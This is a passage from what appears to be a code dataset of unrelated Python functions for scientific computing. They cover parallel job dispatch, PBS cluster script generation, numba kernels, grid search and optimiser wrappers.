distill_batch_predict_max_replica_count\n ),\n 'run_distillation': run_distillation,\n }\n parameter_values.update(\n {\n param: value\n for param, value in distillation_parameters.items()\n if value is not None\n }\n )\n\n # V2 pipeline (with FTE)\n else:\n if run_distillation:\n raise ValueError(\n 'Distillation is currently not supported'\n ' when num_selected_features is specified.'\n )\n\n parameters = {\n 'num_selected_features': num_selected_features,\n 'dataset_level_custom_transformation_definitions': [],\n 'dataset_level_transformations': [],\n 'tf_auto_transform_features': {},\n 'tf_custom_transformation_definitions': [],\n 'legacy_transformations_path': transformations,\n 'feature_transform_engine_dataflow_machine_type': (\n transform_dataflow_machine_type\n ),\n 'feature_transform_engine_dataflow_max_num_workers': (\n transform_dataflow_max_num_workers\n ),\n 'feature_transform_engine_dataflow_disk_size_gb': (\n transform_dataflow_disk_size_gb\n ),\n }\n parameter_values.update(\n {\n param: value\n for param, value in parameters.items()\n if value is not None\n }\n )\n\n return parameter_values", "def grid_search(func, param_grid, wrapper=None, n_jobs=1, verbose=0):\n if wrapper is None:\n wrapper = _default_wrapper\n # check if enough memory\n size_ = _get_final_size(param_grid)\n if size_ > 0.9 * psutil.virtual_memory().available:\n raise MemoryError(\"not enough memory 'param_grid'\"\n \" weigh {0} ..\".format(humanize.naturalsize(size_)))\n # sanitize value to list type\n for key, value in param_grid.iteritems():\n if not isinstance(value, list):\n param_grid[key] = [value]\n list_kwargs = [dict(zip(param_grid, x))\n for x in itertools.product(*param_grid.values())]\n # Run the reconstruction\n if verbose > 0:\n if n_jobs == -1:\n n_jobs_used = psutil.cpu_count()\n elif n_jobs == -2:\n n_jobs_used = psutil.cpu_count() - 1\n else:\n n_jobs_used = n_jobs\n 
print((\"Running grid_search for {0} candidates\"\n \" on {1} jobs\").format(len(list_kwargs), n_jobs_used))\n res = Parallel(n_jobs=n_jobs, verbose=verbose)(\n delayed(wrapper)(func, **kwargs)\n for kwargs in list_kwargs)\n return list_kwargs, res", "def c_torch_score_mp(ve, xs, y, func_index, n_jobs=1, return_numpy=False, clf=False, single_start=6):\n if isinstance(ve, np.ndarray):\n ve = ve.tolist()\n if n_jobs == 1:\n return c_torch_score(ve, xs, y, func_index, return_numpy, clf, single_start=single_start)\n else:\n for i in range(3):\n print(\"For torch with c++ (c_torch), with n_jobs>1, this function is very slow!\")\n\n pool = Pool(n_jobs)\n\n left = int(len(ve) % n_jobs)\n\n if left > 0:\n bs = int(len(ve) // n_jobs)\n nve = [ve[bs * (i - 1):i * bs] for i in range(1, n_jobs + 1)]\n nve.append(ve[-left:])\n else:\n bs = int(len(ve) // n_jobs)\n nve = [ve[bs * (i - 1):i * bs] for i in range(1, n_jobs + 1)]\n\n res = []\n for nvei in nve:\n ret = pool.apply(c_torch_score_temp, (nvei, xs, y, func_index, clf, single_start))\n res.append(ret)\n pool.close()\n pool.join()\n\n if not return_numpy:\n res = torch.cat(res)\n else:\n res = np.concatenate(res)\n return res", "def jac_pnp(beta, **kw):\n temp = kw.get('temp', 85)\n rate_source_ = kw.get('rate_source', 1E-4)\n DSIN_ = kw.get('DSIN', 3.92E-16)\n stress_voltage = kw.get('stress_voltage', 3.75)\n L1_ = kw.get('L1', 0.075)\n N1_ = int(kw.get('N1', 100))\n tsteps_ = int(kw.get('tsteps', 720))\n time_s = kw.get('time_s', np.array([0]))\n rsh_norm_ = kw.get('rsh_norm', np.array([0]))\n print('Called jac_pnp')\n\n S0_ = 10 ** beta[0]\n h_ = 10 ** beta[1]\n DSF_ = 10 ** beta[2]\n # y0 = ml_pid.simulate_rsh(\n # S0=S0_, h=h_, DSF=DSF_, simulation_time=np.amax(time_s) * 1.1,\n # temperature=temp, rate_source=rate_source_, DSIN=DSIN_,\n # stress_voltage=stress_voltage, L1=L1_, m=1, time_steps=tsteps_,\n # N1=N1_\n # )\n\n EPS_ = np.finfo(np.float).eps\n delta = EPS_ ** (1 / 3)\n delta = 1E-1\n\n # forward\n # derivparams_forward = []\n derivparams = []\n for i in range(len(beta)):\n copy = np.array(beta)\n copy[i] += delta\n derivparams.append(copy)\n # backward\n # derivparams_backward = []\n for i in range(len(beta)):\n copy = np.array(beta)\n copy[i] -= delta\n derivparams.append(copy)\n\n # results_forward = pool.map(partial(func, **kw), derivparams_forward)\n # results_backward = pool.map(partial(func, **kw), derivparams_backward)\n results = np.array(pool.map(partial(func, **kw), derivparams))\n [m, n] = results.shape\n idx = int(m / 2)\n results_forward = results[0:idx, :]\n results_backward = results[idx::,:]\n derivs = [(rf - rb) / (2.0 * delta) for rf, rb in zip(results_forward, results_backward)]\n return np.array(derivs).T", "def run_migrad(self, fitarg, **kwargs):\n self.fitarg = fitarg\n kwargs['up'] = 1.\n\n\n logging.debug(self._par_names)\n logging.debug(self.__wrap_likelihood(list(fitarg['pinit'].values())))\n\n if kwargs['scipy']:\n self._res = op.minimize(self.__wrap_likelihood,\n list(fitarg['pinit'].values()),\n bounds=list(fitarg['limits'].values()),\n method='TNC',\n #method='Powell',\n options={'maxiter': kwargs['ncall']} #'xtol': 1e-20, 'eps' : 1e-20, 'disp': True}\n #tol=None, callback=None,\n #options={'disp': False, 'minfev': 0, 'scale': None,\n #'rescale': -1, 'offset': None, 'gtol': -1,\n #'eps': 1e-08, 'eta': -1, 'maxiter': kwargs['ncall'],\n #'maxCGit': -1, 'mesg_num': None, 'ftol': -1, 'xtol': -1, 'stepmx': 0,\n #'accuracy': 0}\n )\n logging.info(self._res)\n for i, k in enumerate(self._par_names):\n 
fitarg[k] = self._res.x[i]\n\n logging.debug(fitarg)\n\n cmd_string = \"lambda {0}: self.__calcLikelihood({0})\".format(\n (\", \".join(self._par_names), \", \".join(self._par_names)))\n\n string_args = \", \".join(self._par_names)\n global f # needs to be global for eval to find it\n f = lambda *args: self.__calc_likelihood(*args)\n\n cmd_string = \"lambda %s: f(%s)\" % (string_args, string_args)\n logging.debug(cmd_string)\n\n # work around so that the parameters get names for minuit\n self._minimize_f = eval(cmd_string, globals(), locals())\n self._minimize_f.errordef = minuit.Minuit.LEAST_SQUARES\n\n self._m = minuit.Minuit(self._minimize_f,\n #list(fitarg['pinit'].values()),\n **fitarg['pinit'],\n #names=self._par_names\n )\n# print_level=kwargs['verbosity'],\n# errordef=kwargs['up'],\n# pedantic=kwargs['pedantic'],\n #**fitarg)\n\n for p in self._par_names:\n self._m.fixed[p] = fitarg['fix'][p]\n self._m.limits[p] = fitarg['limits'][p]\n self._m.errors[p] = fitarg['error'][p]\n\n self._m.tol = kwargs['tol']\n self._m.strategy = kwargs['strategy']\n\n logging.debug(\"tol {0:.2e}, strategy: {1:n}\".format(\n self._m.tol, self._m.strategy.strategy))\n\n self._m.migrad(ncall=kwargs['ncall']) #, precision = kwargs['precision'])", "def effective_n_jobs(n_jobs=-1):\n if n_jobs == 1:\n return 1\n\n backend, backend_n_jobs = get_active_backend()\n if n_jobs is None:\n n_jobs = backend_n_jobs\n return backend.effective_n_jobs(n_jobs=n_jobs)", "def run_on_server(func_master, *args, **kwargs):\n\n from gausspy.gaussian_job_manager import Job\n #we can pass in job_obj details with the function/class if we wish\n try:\n func_obj, job_obj = func_master\n except TypeError:\n func_obj = func_master\n job_obj = None\n\n try:\n name = func_obj.calc.label\n except AttributeError:\n try:\n name = func_obj.func_name\n except AttributeError:\n name = 'unknown'\n\n name += '_' + str(uuid.uuid1())\n\n \n #this means functions that actually have an inc_session keyword argument\n #will have the value stripped out (I'm hoping we don't come across any)\n try:\n inc_session = kwargs.pop('inc_session')\n except KeyError:\n inc_session=False\n\n try:\n savefiles = kwargs.pop('savefiles')\n except KeyError:\n savefiles = ''\n\n try: \n namefile_f = kwargs.pop('namefile_f')\n except KeyError:\n namefile_f = lambda e: name\n try:\n compress = kwargs.pop('compress')\n except KeyError:\n compress = False\n \n if inc_session:\n dill.dump_session(name + '_session.pkl')\n\n with open(name + '.pkl', 'w') as f:\n dill.dump([func_obj, args, kwargs], f)\n\n serv_home = config.get('gaussian', 'gauss_home')\n path = os.path.join(serv_home + get_active_path(), '')\n serv_work = config.get('gaussian', 'gauss_scratch')\n scratch_path = os.path.join(serv_work + get_active_path(), '')\n #if we have set the ASE and Gaussian home/work directories to nothing. I.e. 
we are running on the node\n #then the only way of recovering the original directories is to use the PBS shell variables that contain the directory\n #that the job was submitted from (which is the correct home directory).\n\n #scratch_path = os.environ['PBS_O_WORKDIR '].replace('/home','/work')\n\n exec_command = 'execute_calc {f_pckl};'.format(\n pth=path,\n f_pckl=path + name + '.pkl')\n\n if compress and savefiles:\n exec_command += 'mkdir -p {scratch};'.format(scratch=scratch_path)\n exec_command += 'tar -cvjf {n}.tar.bz2 {f};'.format(n=name, f=savefiles)\n exec_command += 'cp {n}.tar.bz2 {scratch};'.format(n=name, scratch=scratch_path)\n elif savefiles:\n exec_command += 'mkdir -p {scratch};'.format(scratch=scratch_path)\n #exec_command += 'find . -maxdepth 1 ! -iregex \"{r}\" -exec cp -r {} {scratch} \\;'.format(r=savefiles, scratch=scratch_path)\n exec_command += 'cp {f} {scratch};'.format(f=savefiles, scratch=scratch_path)\n\n if not job_obj:\n try:\n nodes = func_obj.calc.job_params['nodes']\n mem = func_obj.calc.job_params['memory'] + nodes * 150\n time = func_obj.calc.job_params['time']\n queue = func_obj.calc.job_params['queue']\n\n job_obj = Job(procs=nodes, memory=mem, walltime=time, queue=queue)\n except AttributeError:\n job_obj = Job()\n\n script = job_obj.gen_header() + exec_command\n\n with open(name + '_job_script.sh', 'w') as f:\n f.write(script)\n\n if inc_session:\n extra_files = [name + '.pkl', name + '_session.pkl']\n else:\n extra_files = [name + '.pkl']\n\n submission = remote.qsub(os.getcwd() + '/' + name + '_job_script.sh', extra_files=extra_files)\n\n os.remove(name + '.pkl')\n\n try:\n os.remove(name + '_session.pkl')\n except OSError:\n pass\n\n return submission", "def test_generic(args):\n (tol,cons,sol,test_func,low,high,shape) = args\n #if shape == 0:\n #x0 = np.random.uniform(0, 2, (1000, 5))\n #print('here')\n x0 = init_feasible(cons, low=low, high=high, shape=shape)\n t0 = time.time()\n res = minimize_qpso(test_func, x0, tol=tol)\n t1= time.time()\n converged = res.success\n qpso_converged = 0\n qpso_nit = res.nit\n try:\n np.testing.assert_array_almost_equal(sol, res.x, 3)\n except:\n qpso_converged = 1\n # if high is None:\n #x0 = np.random.uniform(0, 2, (1000, 5))\n # else:\n x0 = init_feasible(cons, low=low, high=high, shape=shape)\n t2= time.time()\n res = minimize(test_func,x0, tol=tol)\n t3 = time.time()\n converged = res.success\n pso_converged = 0\n pso_nit = res.nit\n assert converged, res.message\n try:\n np.testing.assert_array_almost_equal(sol, res.x, 3)\n except:\n pso_converged = 1\n \n return qpso_converged, qpso_nit ,t1-t0, pso_converged , pso_nit , t3-t2", "def jacobian_numba(coordinates, points, jac, greens_function):\n east, north, upward = coordinates[:]\n point_east, point_north, point_upward = points[:]\n for i in prange(east.size):\n for j in range(point_east.size):\n jac[i, j] = greens_function(\n east[i],\n north[i],\n upward[i],\n point_east[j],\n point_north[j],\n point_upward[j],\n )", "def backsubstitution_numba(b, dofmap, num_dofs_per_element, mpc,\n global_indices):\n (slaves, slave_cells, cell_to_slave, cell_to_slave_offset,\n masters_local, coefficients, offsets) = mpc\n slaves_visited = numpy.empty(0, dtype=numpy.float64)\n\n # Loop through slave cells\n for (index, cell_index) in enumerate(slave_cells):\n cell_slaves = cell_to_slave[cell_to_slave_offset[index]:\n cell_to_slave_offset[index+1]]\n local_dofs = dofmap[num_dofs_per_element * cell_index:\n num_dofs_per_element * cell_index\n + num_dofs_per_element]\n\n # 
Find the global index of the slaves on the cell in the slaves-array\n global_slaves_index = []\n for gi in range(len(slaves)):\n if in_numpy_array(cell_slaves, slaves[gi]):\n global_slaves_index.append(gi)\n\n for slave_index in global_slaves_index:\n slave = slaves[slave_index]\n k = -1\n # Find local position of slave dof\n for local_dof in local_dofs:\n if global_indices[local_dof] == slave:\n k = local_dof\n assert k != -1\n # Check if we have already inserted for this slave\n if not in_numpy_array(slaves_visited, slave):\n slaves_visited = numpy.append(slaves_visited, slave)\n slaves_masters = masters_local[offsets[slave_index]:\n offsets[slave_index+1]]\n slaves_coeffs = coefficients[offsets[slave_index]:\n offsets[slave_index+1]]\n for (master, coeff) in zip(slaves_masters, slaves_coeffs):\n b[k] += coeff*b[master]", "def create_job(jobrun, vcf_filenames):\n if jobrun == \"cluster\":\n \"\"\"\n Supports only PBS clusters for now.\n \"\"\"\n for i in vcf_filenames:\n job_name = os.path.basename(i)\n job_print_string = \"#PBS -N %s\\n#PBS -M apirani@med.umich.edu\\n#PBS -m abe\\n#PBS -V\\n#PBS -l nodes=1:ppn=4,pmem=4000mb,walltime=72:00:00\\n#PBS -q fluxod\\n#PBS -A esnitkin_fluxod\\n#PBS -l qos=flux\\n\\n/home/apirani/anaconda/bin/python /nfs/esnitkin/bin_group/scripts/Scripts_v2.0/variants_position_analysis/reason_job.py -filter2_only_snp_vcf_dir %s -filter2_only_snp_vcf_file %s\\n\" % (job_name, args.filter2_only_snp_vcf_dir, i)\n job_file_name = \"%s.pbs\" % (i)\n f1=open(job_file_name, 'w+')\n f1.write(job_print_string)\n f1.close()\n #os.system(\"mv %s/*.pbs %s/temp\" % (args.filter2_only_snp_vcf_dir, args.filter2_only_snp_vcf_dir))\n pbs_dir = args.filter2_only_snp_vcf_dir + \"/*.pbs\"\n pbs_scripts = glob.glob(pbs_dir)\n for i in pbs_scripts:\n print \"Running: qsub %s\" % i\n #os.system(\"qsub %s\" % i)\n\n elif jobrun == \"parallel-local\":\n \"\"\"\n Generate a Command list of each job and run it in parallel on different cores available on local system\n \"\"\"\n command_array = []\n command_file = \"%s/commands_list.sh\" % args.filter2_only_snp_vcf_dir\n f3 = open(command_file, 'w+')\n\n\n for i in vcf_filenames:\n job_name = os.path.basename(i)\n job_print_string = \"#PBS -N %s\\n#PBS -M apirani@med.umich.edu\\n#PBS -m abe\\n#PBS -V\\n#PBS -l nodes=1:ppn=4,pmem=4000mb,walltime=72:00:00\\n#PBS -q fluxod\\n#PBS -A esnitkin_fluxod\\n#PBS -l qos=flux\\n\\n/home/apirani/anaconda/bin/python /nfs/esnitkin/bin_group/scripts/Scripts_v2.0/variants_position_analysis/reason_job.py -filter2_only_snp_vcf_dir %s -filter2_only_snp_vcf_file %s\\n\" % (job_name, args.filter2_only_snp_vcf_dir, i)\n job_file_name = \"%s.pbs\" % (i)\n f1=open(job_file_name, 'w+')\n f1.write(job_print_string)\n f1.close()\n #os.system(\"mv %s/*.pbs %s/temp\" % (args.filter2_only_snp_vcf_dir, args.filter2_only_snp_vcf_dir))\n pbs_dir = args.filter2_only_snp_vcf_dir + \"/*.pbs\"\n pbs_scripts = glob.glob(pbs_dir)\n\n\n for i in pbs_scripts:\n f3.write(\"bash %s\\n\" % i)\n f3.close()\n with open(command_file, 'r') as fpp:\n for lines in fpp:\n lines = lines.strip()\n command_array.append(lines)\n fpp.close()\n print len(command_array)\n if args.numcores:\n num_cores = int(num_cores)\n else:\n num_cores = multiprocessing.cpu_count()\n results = Parallel(n_jobs=num_cores)(delayed(run_command)(command) for command in command_array)\n\n elif jobrun == \"parallel-single-cluster\":\n print \" \"\n else:\n \"\"\"\n Generate a Command list of each job and run it on local system one at a time\n \"\"\"\n command_array = 
[]\n command_file = \"%s/commands_list.sh\" % args.filter2_only_snp_vcf_dir\n os.system(\"bash %s\" % command_file)", "def default_params(defaults):\n def wrap(function):\n def withargs(*args, **kwargs):\n merged = {}\n merged.update(defaults)\n merged.update(kwargs)\n return function(*args, **merged)\n return withargs\n return wrap", "def __call__(self, imagename=None, box=None, region=None, chans=None, stokes=None, axis=None, mask=None, minpts=None, multifit=None, spxtype=None, spxest=None, spxfix=None, div=None, spxsol=None, spxerr=None, model=None, residual=None, wantreturn=None, stretch=None, logresults=None, logfile=None, append=None, sigma=None, outsigma=None, ):\n if not hasattr(self, \"__globals__\") or self.__globals__ == None :\n self.__globals__=stack_frame_find( )\n #casac = self.__globals__['casac']\n casalog = self.__globals__['casalog']\n casa = self.__globals__['casa']\n #casalog = casac.casac.logsink()\n self.__globals__['__last_task'] = 'spxfit'\n self.__globals__['taskname'] = 'spxfit'\n ###\n self.__globals__['update_params'](func=self.__globals__['taskname'],printtext=False,ipython_globals=self.__globals__)\n ###\n ###\n #Handle globals or user over-ride of arguments\n #\n if type(self.__call__.func_defaults) is NoneType:\n function_signature_defaults={}\n else:\n function_signature_defaults=dict(zip(self.__call__.func_code.co_varnames[1:],self.__call__.func_defaults))\n useLocalDefaults = False\n\n for item in function_signature_defaults.iteritems():\n key,val = item\n keyVal = eval(key)\n if (keyVal == None):\n #user hasn't set it - use global/default\n pass\n else:\n #user has set it - use over-ride\n if (key != 'self') :\n useLocalDefaults = True\n\n myparams = {}\n if useLocalDefaults :\n for item in function_signature_defaults.iteritems():\n key,val = item\n keyVal = eval(key)\n exec('myparams[key] = keyVal')\n self.parameters[key] = keyVal\n if (keyVal == None):\n exec('myparams[key] = '+ key + ' = self.itsdefault(key)')\n keyVal = eval(key)\n if(type(keyVal) == dict) :\n if len(keyVal) > 0 :\n exec('myparams[key] = ' + key + ' = keyVal[len(keyVal)-1][\\'value\\']')\n else :\n exec('myparams[key] = ' + key + ' = {}')\n\n else :\n print ''\n\n myparams['imagename'] = imagename = self.parameters['imagename']\n myparams['box'] = box = self.parameters['box']\n myparams['region'] = region = self.parameters['region']\n myparams['chans'] = chans = self.parameters['chans']\n myparams['stokes'] = stokes = self.parameters['stokes']\n myparams['axis'] = axis = self.parameters['axis']\n myparams['mask'] = mask = self.parameters['mask']\n myparams['minpts'] = minpts = self.parameters['minpts']\n myparams['multifit'] = multifit = self.parameters['multifit']\n myparams['spxtype'] = spxtype = self.parameters['spxtype']\n myparams['spxest'] = spxest = self.parameters['spxest']\n myparams['spxfix'] = spxfix = self.parameters['spxfix']\n myparams['div'] = div = self.parameters['div']\n myparams['spxsol'] = spxsol = self.parameters['spxsol']\n myparams['spxerr'] = spxerr = self.parameters['spxerr']\n myparams['model'] = model = self.parameters['model']\n myparams['residual'] = residual = self.parameters['residual']\n myparams['wantreturn'] = wantreturn = self.parameters['wantreturn']\n myparams['stretch'] = stretch = self.parameters['stretch']\n myparams['logresults'] = logresults = self.parameters['logresults']\n myparams['logfile'] = logfile = self.parameters['logfile']\n myparams['append'] = append = self.parameters['append']\n myparams['sigma'] = sigma = 
self.parameters['sigma']\n myparams['outsigma'] = outsigma = self.parameters['outsigma']\n\n if type(spxest)==float: spxest=[spxest]\n if type(spxfix)==bool: spxfix=[spxfix]\n\n result = None\n\n#\n# The following is work around to avoid a bug with current python translation\n#\n mytmp = {}\n\n mytmp['imagename'] = imagename\n mytmp['box'] = box\n mytmp['region'] = region\n mytmp['chans'] = chans\n mytmp['stokes'] = stokes\n mytmp['axis'] = axis\n mytmp['mask'] = mask\n mytmp['minpts'] = minpts\n mytmp['multifit'] = multifit\n mytmp['spxtype'] = spxtype\n mytmp['spxest'] = spxest\n mytmp['spxfix'] = spxfix\n mytmp['div'] = div\n mytmp['spxsol'] = spxsol\n mytmp['spxerr'] = spxerr\n mytmp['model'] = model\n mytmp['residual'] = residual\n mytmp['wantreturn'] = wantreturn\n mytmp['stretch'] = stretch\n mytmp['logresults'] = logresults\n mytmp['logfile'] = logfile\n mytmp['append'] = append\n mytmp['sigma'] = sigma\n mytmp['outsigma'] = outsigma\n pathname='file://' + casa['dirs']['xml'] + '/'\n trec = casac.casac.utils().torecord(pathname+'spxfit.xml')\n\n casalog.origin('spxfit')\n try :\n #if not trec.has_key('spxfit') or not casac.casac.utils().verify(mytmp, trec['spxfit']) :\n #return False\n\n casac.casac.utils().verify(mytmp, trec['spxfit'], True)\n scriptstr=['']\n saveinputs = self.__globals__['saveinputs']\n\n # Save .last file for this task execution. MPI servers don't write it (CASR-329).\n from mpi4casa.MPIEnvironment import MPIEnvironment\n do_full_logging = MPIEnvironment.is_mpi_disabled_or_client()\n if type(self.__call__.func_defaults) is NoneType:\n saveinputs=''\n else:\n saveinputs('spxfit', 'spxfit.last', myparams, self.__globals__,scriptstr=scriptstr, do_save_inputs=do_full_logging)\n\n tname = 'spxfit'\n spaces = ' '*(18-len(tname))\n casalog.post('\\n##########################################'+\n '\\n##### Begin Task: ' + tname + spaces + ' #####')\n # Don't do telemetry from MPI servers (CASR-329)\n if do_full_logging and casa['state']['telemetry-enabled']:\n #casalog.poststat('Begin Task: ' + tname)\n task_starttime = str(datetime.datetime.now())\n if type(self.__call__.func_defaults) is NoneType:\n casalog.post(scriptstr[0]+'\\n', 'INFO')\n else:\n casalog.post(scriptstr[1][1:]+'\\n', 'INFO')\n\n # Effective call to the task as defined in gcwrap/python/scripts/task_*\n result = spxfit(imagename, box, region, chans, stokes, axis, mask, minpts, multifit, spxtype, spxest, spxfix, div, spxsol, spxerr, model, residual, wantreturn, stretch, logresults, logfile, append, sigma, outsigma)\n\n if do_full_logging and casa['state']['telemetry-enabled']:\n task_endtime = str(datetime.datetime.now())\n casalog.poststat( 'Task ' + tname + ' complete. 
Start time: ' + task_starttime + ' End time: ' + task_endtime )\n casalog.post('##### End Task: ' + tname + ' ' + spaces + ' #####'+\n '\\n##########################################')\n\n except Exception, instance:\n if(self.__globals__.has_key('__rethrow_casa_exceptions') and self.__globals__['__rethrow_casa_exceptions']) :\n raise\n else :\n #print '**** Error **** ',instance\n tname = 'spxfit'\n casalog.post('An error occurred running task '+tname+'.', 'ERROR')\n pass\n casalog.origin('')\n\n return result", "def get_pij_numba(d, scale, i):\n \n d_scaled = -d/scale\n d_scaled -= np.max(d_scaled)\n exp_D = np.exp(d_scaled)\n exp_D[i] = 0\n \n return exp_D/np.sum(exp_D)", "def addJob(self, args, functionToRun, identifier, metadata=None, forceUseThreads = False, uniqueHandler=\"any\", clientQueue = False, groupInfo = None):\n assert \"original_function\" in dir(functionToRun), \"to parallelize a function, it must be\" \\\n \" decorated with RAVEN Parallel decorator\"\n if self._server is None or forceUseThreads:\n internalJob = Runners.factory.returnInstance('SharedMemoryRunner', args,\n functionToRun.original_function,\n identifier=identifier,\n metadata=metadata,\n uniqueHandler=uniqueHandler,\n profile=self.__profileJobs)\n else:\n if self._parallelLib == ParallelLibEnum.dask:\n arguments = tuple([self._server] + list(args))\n else:\n arguments = args\n if self._parallelLib == ParallelLibEnum.dask:\n internalJob = Runners.factory.returnInstance('DaskRunner', arguments,\n functionToRun.original_function,\n identifier=identifier,\n metadata=metadata,\n uniqueHandler=uniqueHandler,\n profile=self.__profileJobs)\n\n elif self._parallelLib == ParallelLibEnum.ray:\n internalJob = Runners.factory.returnInstance('RayRunner', arguments,\n functionToRun.remote,\n identifier=identifier,\n metadata=metadata,\n uniqueHandler=uniqueHandler,\n profile=self.__profileJobs)\n # set the client info\n internalJob.clientRunner = clientQueue\n # set the groupping id if present\n if groupInfo is not None:\n groupId = groupInfo['id']\n # TODO: create method in Runner to set flags,ids,etc in the instanciated runner\n internalJob.groupId = groupId\n if groupId not in self.__batching:\n # NOTE: The size of the group is only set once the first job beloning to a group is added\n # ***** THE size of a group is IMMUTABLE *****\n self.__batching[groupId] = {\"counter\": 0, \"ids\": [], \"size\": groupInfo['size'], 'finished': []}\n self.__batching[groupId][\"counter\"] += 1\n if self.__batching[groupId][\"counter\"] > self.__batching[groupId][\"size\"]:\n self.raiseAnError(RuntimeError, f\"group id {groupId} is full. 
Size reached:\")\n self.__batching[groupId][\"ids\"].append(identifier)\n # add the runner in the Queue\n self.reAddJob(internalJob)", "def run_job(job, interrupt_if_necessary):", "def test_diff_method_None_jit():\n\n dev = qml.device(\"default.qubit.jax\", wires=1, shots=10)\n\n @jax.jit\n def wrapper(x):\n with qml.queuing.AnnotatedQueue() as q:\n qml.RX(x, wires=0)\n qml.expval(qml.PauliZ(0))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n\n return qml.execute([tape], dev, gradient_fn=None)\n\n assert jax.numpy.allclose(wrapper(jax.numpy.array(0.0))[0], 1.0)", "def round_numba(g):\n N = len(g)\n gr = np.zeros(N)\n for i in range(N):\n gr[i] = round(g[i])\n return gr", "def run_job(args):\n\n global stop_all\n global jobfiles_global\n global jobwcl\n\n jobwcl = WCL()\n jobfiles = {'infullnames': [args.config, args.workflow],\n 'outfullnames': [],\n 'output_putinfo': {}}\n jobfiles_global = {'infullnames': [args.config, args.workflow],\n 'outfullnames': [],\n 'output_putinfo': {}}\n\n jobstart = time.time()\n with open(args.config, 'r') as wclfh:\n jobwcl.read(wclfh, filename=args.config)\n jobwcl['verify_files'] = miscutils.checkTrue('verify_files', jobwcl, False)\n jobwcl['jobroot'] = os.getcwd()\n jobwcl['job_max_usage'] = 0\n #jobwcl['pre_job_disk_usage'] = pfwutils.diskusage(jobwcl['jobroot'])\n jobwcl['pre_job_disk_usage'] = 0\n\n # Save pointers to archive information for quick lookup\n if jobwcl[pfwdefs.USE_HOME_ARCHIVE_INPUT] != 'never' or \\\n jobwcl[pfwdefs.USE_HOME_ARCHIVE_OUTPUT] != 'never':\n jobwcl['home_archive_info'] = jobwcl[pfwdefs.SW_ARCHIVESECT][jobwcl[pfwdefs.HOME_ARCHIVE]]\n else:\n jobwcl['home_archive_info'] = None\n\n if jobwcl[pfwdefs.USE_TARGET_ARCHIVE_INPUT] != 'never' or \\\n jobwcl[pfwdefs.USE_TARGET_ARCHIVE_OUTPUT] != 'never':\n jobwcl['target_archive_info'] = jobwcl[pfwdefs.SW_ARCHIVESECT][jobwcl[pfwdefs.TARGET_ARCHIVE]]\n else:\n jobwcl['target_archive_info'] = None\n\n # run the tasks (i.e., each wrapper execution)\n stop_all = miscutils.checkTrue('stop_on_fail', jobwcl, True)\n\n try:\n jobfiles['infullnames'] = gather_initial_fullnames()\n jobfiles_global['infullnames'].extend(jobfiles['infullnames'])\n miscutils.coremakedirs('log')\n miscutils.coremakedirs('outputwcl')\n exitcode, jobfiles = job_workflow(args.workflow, jobfiles, jobwcl)\n except Exception:\n (extype, exvalue, trback) = sys.exc_info()\n print '!' * 60\n traceback.print_exception(extype, exvalue, trback, file=sys.stdout)\n exitcode = pfwdefs.PF_EXIT_FAILURE\n print \"Aborting rest of wrapper executions. 
Continuing to end-of-job tasks\\n\\n\"\n\n try:\n create_junk_tarball(jobwcl, jobfiles, exitcode)\n except:\n print \"Error creating junk tarball\"\n # if should transfer at end of job\n if jobfiles['output_putinfo']:\n print \"\\n\\nCalling file transfer for end of job (%s files)\" % \\\n (len(jobfiles['output_putinfo']))\n\n copy_output_to_archive(jobwcl, jobfiles, jobfiles['output_putinfo'], 'job',\n 'job_output', exitcode)\n else:\n print \"\\n\\n0 files to transfer for end of job\"\n if miscutils.fwdebug_check(1, \"PFWRUNJOB_DEBUG\"):\n miscutils.fwdebug_print(\"len(jobfiles['outfullnames'])=%s\" % \\\n (len(jobfiles['outfullnames'])))\n print \"\\nDESDMTIME: pfwrun_job %0.3f\" % (time.time()-jobstart)\n return exitcode", "def serial_job(func, inputs):\n\n output = []\n for i, finput in enumerate(inputs):\n foutput = func(finput)\n output.append(foutput)\n output = np.array(output, dtype=object)\n\n return np.transpose(output)", "def __call__(self, *args, **kwargs):\n\n wait_for = kwargs.pop(\"wait_for\", None)\n\n # {{{ run control\n\n key_bits = kwargs.pop(\"key_bits\", None)\n if key_bits is None:\n key_bits = int(np.iinfo(self.key_dtype).bits)\n\n n = len(args[self.first_array_arg_idx])\n\n allocator = kwargs.pop(\"allocator\", None)\n if allocator is None:\n allocator = args[self.first_array_arg_idx].allocator\n\n queue = kwargs.pop(\"allocator\", None)\n if queue is None:\n queue = args[self.first_array_arg_idx].queue\n\n args = list(args)\n\n base_bit = 0\n while base_bit < key_bits:\n sorted_args = [\n cl.array.empty(queue, n, arg_descr.dtype, allocator=allocator)\n for arg_descr in self.arguments\n if arg_descr.name in self.sort_arg_names]\n\n scan_args = args + sorted_args + [base_bit]\n\n last_evt = self.scan_kernel(*scan_args,\n **dict(queue=queue, wait_for=wait_for))\n wait_for = [last_evt]\n\n # substitute sorted\n for i, arg_descr in enumerate(self.arguments):\n if arg_descr.name in self.sort_arg_names:\n args[i] = sorted_args[self.sort_arg_names.index(arg_descr.name)]\n\n base_bit += self.bits\n\n return [arg_val\n for arg_descr, arg_val in zip(self.arguments, args)\n if arg_descr.name in self.sort_arg_names], last_evt\n\n # }}}", "def process_kernel_arg(\n self, var, llvm_arg, arg_type, index, modified_arrays, sycl_queue_val\n ):\n if isinstance(arg_type, types.npytypes.Array):\n if llvm_arg is None:\n raise NotImplementedError(arg_type, var)\n\n storage = cgutils.alloca_once(self.builder, utils.LLVMTypes.int64_t)\n self.builder.store(self.context.get_constant(types.int64, 0), storage)\n ty = numba_type_to_dpctl_typenum(context=self.context, type=types.int64)\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n storage,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )\n\n storage = cgutils.alloca_once(self.builder, utils.LLVMTypes.int64_t)\n self.builder.store(self.context.get_constant(types.int64, 0), storage)\n ty = numba_type_to_dpctl_typenum(context=self.context, type=types.int64)\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n storage,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )\n\n # Handle array size\n array_size_member = self.builder.gep(\n llvm_arg,\n [\n self.context.get_constant(types.int32, 0),\n self.context.get_constant(types.int32, 2),\n ],\n )\n\n ty = numba_type_to_dpctl_typenum(context=self.context, type=types.int64)\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n array_size_member,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n 
